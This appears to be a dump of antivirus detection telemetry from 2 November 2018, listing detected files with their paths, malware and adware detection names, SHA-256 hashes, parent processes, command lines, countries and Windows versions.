  Row(detection=Row(filename='fifa 16 downloader.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.672\\FIFA 16 Downloader.exe', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2a96eb3f66e560f54156019867451774c2994752badd1f8520ec29d949187b45', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\FIFA 16 Downloader\\\\\\\\FIFA 16 Downloader.zip\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\WinRAR\\WinRAR.exe', parentsize=1463288, timestamp='2018-11-02T14:58:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2af746c571d7b0473e5255e68331ad4bf23e9c15596db399883ab1677dbc4a1c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-2.available\\Avira\\2AF746C571D7B0473E5255E68331AD4BF23E9C15596DB399883AB1677DBC4A1C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2af746c571d7b0473e5255e68331ad4bf23e9c15596db399883ab1677dbc4a1c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T06:03:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pol.exe', filepath='I:\\ألعاب\\Games 1\\بيت الموت 2\\POL\\POL.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='2afbb15482723fb8a11584946a800fa54f793f35a9f6a0cab09f605d2ffe9463', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:27:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-183406-66df7719', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_3e2b689b\\AVSCAN-20181102-180350-895CFE35\\AVSCAN-20181102-183406-66DF7719', filesize=9048000, name='PUA/Systweak.Gen4.#M1.#R1'), hash='2b47b9fcc8d7d26f933a3323208ec486445b48704d107e4fe4c7151959156d2b', metadata=Row(cmdline=None, country='JP', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:34:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:29:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:00:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:38:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:widacc', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:widacc', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T12:30:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='_default.pif:mupygh', filepath='E:\\alte Sicherungen allgemein 27.08.2011\\alteSachen\\altercomp\\WINDOWS\\_default.pif:mupygh', filesize=64000, name='TR/Lefeat.DLL1.#M1.#R1'), hash='2c1b2010dddfa99a40da5cee2b70bb72bacb274c692b7e53e3aac2360c759311', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Microsoft Security Client\\MsMpEng.exe', parentsize=119864, timestamp='2018-11-02T15:44:16Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='transcodedwallpaper.jpg', filepath='C:\\Users\\X\\AppData\\Roaming\\Microsoft\\Windows\\Themes\\TranscodedWallpaper.jpg', filesize=3456000, name='EXP/MS04-028.JPEG.A.#M1.#R1'), hash='2c53eb208a8212d4b6ac2fa8f7e28d8ce39c7d8bbd09a474eda7d0a18e261bb7', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2616320, timestamp='2018-11-02T08:00:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-120714-59656dd5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e1c27c17\\AVSCAN-20181102-120108-24364FDE\\AVSCAN-20181102-120714-59656DD5', filesize=3264000, name='TR/Dldr.Banload.2c9bf3.#M1.#R1'), hash='2c9bf34eceb54e543f267565014c7d108e6acebcecea3a6b4228ff5650e6c77b', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T15:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='printtxt.exe', filepath='\\\\?\\C:\\INFO2000\\PrintTXT.exe', filesize=1024000, name='HEUR/APC.#M1.#R1'), hash='2cd99c2e7f240662a1ae61620a8cff41af99feb85b46acf2b20b360c118f7c5d', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:05:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='eelgbyrodtiopusw.eel', filepath='\\\\?\\C:\\WINDOWS\\eelgbyrodtiopusw.eel', filesize=2048000, name='Adware/AD.Zdengo.ergtf.#M1.#R1'), hash='2d9f41e3b5a903cf6460d8a09db2c1df940e38949ca693fba65a0ee17d6a7b69', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:58:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='jsttuexhdbmeluzs.jstt', filepath='\\\\?\\C:\\WINDOWS\\jsttuexhdbmeluzs.jstt', filesize=2048000, name='Adware/AD.Zdengo.ergtf.#M1.#R1'), hash='2d9f41e3b5a903cf6460d8a09db2c1df940e38949ca693fba65a0ee17d6a7b69', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T03:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DE2187224FEDA579125DC15840138845305E6FFD6AA64B56B8EC772ED353152', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:50:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DE2187224FEDA579125DC15840138845305E6FFD6AA64B56B8EC772ED353152', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:03:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2DE2187224FEDA579125DC15840138845305E6FFD6AA64B56B8EC772ED353152', filesize=2176000, name='HEUR/AGEN.1034483.#M1.#R1'), hash='2de2187224feda579125dc15840138845305e6ffd6aa64b56b8ec772ed353152', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T13:34:42Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='soldatenspiel-ultimatebot-v006rar.exe', filepath='H:\\SOLDATENSPIEL-ULTIMATEBOT-V006RAR.EXE', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2e4ed3a37739b247a9a395139983a0fbd87c450b1043f7cb7002136608c2c585', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T13:58:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-145923-3f0f8d64', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e7ea83a2\\AVSCAN-20181102-145856-3A47D989\\AVSCAN-20181102-145923-3F0F8D64', filesize=2624000, name='HEUR/AGEN.1017528.#M1.#R1'), hash='2e4ed3a37739b247a9a395139983a0fbd87c450b1043f7cb7002136608c2c585', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T13:59:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='listvtg.exe', filepath='C:\\OpenEdge\\proedit\\win\\listvtg.exe', filesize=512000, name='W32/Alman.BB.#M1.#R1'), hash='2e56531a2e5e0d25de97e74f15f4891921c5a0001167d53a5aaa17b8ace9b682', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:44:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp0000a692', filepath='C:\\Windows\\Temp\\8b7fc75c-b5f7-4e18-b90b-613d33923912\\tmp00000026\\tmp0000a692', filesize=17088000, name='TR/Crypt.XPACK.Gen.#M300.#R2389'), hash='2e6385754887c9b018acc554a8648d727635a75eabe680dc77f7187a95dac57f', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\adaware\\adaware antivirus\\adaware antivirus\\12.3.915.11577\\AdAwareService.exe', parentsize=587832, timestamp='2018-11-02T11:02:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e6fc46b0f15043a5a96391e720402de6b60d7ab743e879c0df91b50569267cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-2.available\\Avira\\2E6FC46B0F15043A5A96391E720402DE6B60D7AB743E879C0DF91B50569267CD', filesize=204000, name='HTML/Infected.WebPage.Gen2.#M1.#R1'), hash='2e6fc46b0f15043a5a96391e720402de6b60d7ab743e879c0df91b50569267cd', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T06:04:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2E80D4E09AB2848696981CE3C00DAB126A8084864368C0E3C5C9EBE9755C3E3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T13:45:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2E80D4E09AB2848696981CE3C00DAB126A8084864368C0E3C5C9EBE9755C3E3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:19:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-38\\2E80D4E09AB2848696981CE3C00DAB126A8084864368C0E3C5C9EBE9755C3E3D', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='2e80d4e09ab2848696981ce3c00dab126a8084864368c0e3c5c9ebe9755c3e3d', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-38.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-4.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\...\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-9.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\T\\\\\\\\Binaries 31.10.2018-37.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T11:13:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='2eb71e9855faf2aa86a4eabc7cff77c755c006a84d89e9ee5678c573fe32039c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-30\\2EB71E9855FAF2AA86A4EABC7CFF77C755C006A84D89E9EE5678C573FE32039C', filesize=576000, name='HEUR/AGEN.1000014.#M1.#R1'), hash='2eb71e9855faf2aa86a4eabc7cff77c755c006a84d89e9ee5678c573fe32039c', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-30.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-3.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-27.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-28.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\z\\\\\\\\Binaries 31.10.2018-29.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T12:59:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='videoconvert-ttab02-a74bec0684c08ff3beb5e8ebd351d67c.exe', filepath='C:\\Users\\X\\Desktop\\source\\MS\\InProd20181026-Tooltab\\VideoConvert-TTAB02-A74BEC0684C08FF3BEB5E8EBD351D67C.exe', filesize=380000, name='PUA/MyWebSearch.Gen.#M300.#R6777'), hash='2ef9d244711647f816f2f0600bfeb1247fad7214ccc12e1851e40d42e7d3b3b0', metadata=Row(cmdline='x c:\\\\\\\\users\\\\\\\\X\\\\\\\\desktop\\\\\\\\source.7z -oc:\\\\\\\\users\\\\\\\\test_user\\\\\\\\desktop\\\\\\\\source\\\\\\\\ -pinfected', country='US', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\Desktop\\Avira_Scripts\\7za.exe', parentsize=587776, timestamp='2018-11-02T04:39:49Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='重置巅峰.exe', filepath='e:\\administrator\\desktop\\重置巅峰.exe', filesize=640000, name='APPL/Agent.2f20e6.#M1.#R1'), hash='2f20e690f38c1b295298cef0898661052e2fd08d0395646469c08390dba3bedf', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T00:57:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-021432-9980a3e5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_9e4d80d8\\AVSCAN-20181102-003900-7AC79805\\AVSCAN-20181102-021432-9980A3E5', filesize=1600000, name='Adware/Agent.urvoa.#M300.#R7636'), hash='30084db8807a5e8a313bb2449496faa258b7df1b9031fb2d7d0a2ef8c9bf5090', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:16:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wizard_setupfailed.htm', filepath='C:\\Users\\X\\Dropbox (TANTO CITRA MANDIRI)\\TANTO CITRA MANDIRI Team Folder\\Campur2\\File Epson\\Manual\\PanelGuide\\LT\\_files\\wizard_setupfailed.htm', filesize=12000, name='W32/Chir.B.#M1.#R1'), hash='3026cb4eb5c428d2a39ed13ce94af8e73f11c38a0035ca17a6a465928d69fb5e', metadata=Row(cmdline='\\\\\\/systemstartup', country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files (x86)\\Dropbox\\Client\\Dropbox.exe', parentsize=3784512, timestamp='2018-11-02T08:09:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setuperror.exe', filepath='\\\\?\\D:\\upgrate\\sources\\setuperror.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3032cf6376bee15074add20c4bb2ae8e1e266689fc8cb602594921a479c81214', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:54:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setuperror.exe', filepath='D:\\upgrate\\sources\\setuperror.exe', filesize=128000, name='W32/Virut.Gen.#M1.#R1'), hash='3032cf6376bee15074add20c4bb2ae8e1e266689fc8cb602594921a479c81214', metadata=Row(cmdline='-k LocalSystemNetworkRestricted', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='D:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T09:49:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='G:\\softwear\\java\\setup.exe', filesize=980000, name='PUA/InstallCore.KV.#M0.#R0'), hash='305b5adcf5b7febb91ae344267f242058764a962c73c771c4894e14c674369a4', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='10', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T13:14:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-121019-dd6b9a62', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_eb4a0c02\\AVSCAN-20181102-120848-D15FFC1A\\AVSCAN-20181102-121019-DD6B9A62', filesize=128000, name='Adware/Agent.1280.#M1.#R1'), hash='305d0081d755b81770db08626e400fbe69326af0d04dcba84e85811f664271fd', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T11:10:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-060131-9a9c8481', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_b5ce89ac\\AVSCAN-20181102-060118-981DBE86\\AVSCAN-20181102-060131-9A9C8481', filesize=1216000, name='HEUR/AGEN.1024609.#M1.#R1'), hash='306c10fc628385bbab90fd17720eeac239b7d8e001cdb72db68317631af13cc8', metadata=Row(cmdline=None, country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T05:01:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='etpricesupd.exe', filepath='C:\\ETKA\\VWAU\\Updater\\Utils\\EtPricesUpd.exe', filesize=1216000, name='HEUR/AGEN.1024609.#M1.#R1'), hash='306c10fc628385bbab90fd17720eeac239b7d8e001cdb72db68317631af13cc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:Ycp1vE+zQ0qQYwLB.1', country='CH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T02:00:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-122715-ebfc2e45', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1c258596\\AVSCAN-20181102-122600-DEF2E376\\AVSCAN-20181102-122715-EBFC2E45', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M1.#R1'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T15:28:00Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adjprog.exe', filepath='C:\\Users\\X\\Desktop\\BKP\\Reset Epson Serie L\\Todos os Resets\\Epson Adjustment Program Resetter L350-L355-L550-L555-L110-L210-L300\\Adjprog.exe', filesize=5632000, name='TR/Crypt.XPACK.Gen2.#M300.#R100738'), hash='30832edce2c0babe49a581af32e7e4a87e257d22598bdcc3e501c0cecb1b33be', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:5FmdsfPG\\\\\\/0udnbF1.1', country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T15:26:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='raidreconstructor.exe', filepath='C:\\Users\\X\\Desktop\\Hirens 7\\HBCD\\Programs\\RAIDReconstructor.exe', filesize=64000, name='TR/Agent.wxqvk.#M1.#R1'), hash='3158f958bd97188137ab047ed4a4963579c6eb8cfb7d5bb9e4da03d817cb1f72', metadata=Row(cmdline='\\\\\\/Install \\\\\\/Update \\\\\\/Quiet  \\\\\\/InstallFile \\\\\\"C:\\\\\\\\$WINDOWS.~BT\\\\\\\\Sources\\\\\\\\Install.esd\\\\\\" \\\\\\/progressCLSID 06cfe2c4-1c5b-4002-bca2-d0667fe5b626 \\\\\\/ReportId {C3BD4254-41A1-4918-A51A-1C74251DF7F3}.201 \\\\\\"\\\\\\/ClientId\\\\\\" \\\\\\"1eeffbbd-5a32-4a02-af22-5323b7db6150\\\\\\" \\\\\\"\\\\\\/CorrelationVector\\\\\\" \\\\\\"pR8P7z\\\\\\/JgEW3X9Vd.5.1.2\\\\\\" \\\\\\/WUCachedFileName \\\\\\"17134.1.180410-1804.rs4_release_CLIENTCONSUMER_RET_x86FRE_en-us.esd\\\\\\"', country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\$WINDOWS.~BT\\Sources\\SetupHost.exe', parentsize=697528, timestamp='2018-11-02T20:27:23Z'), dt=datetime.date(2018, 11, 2)),
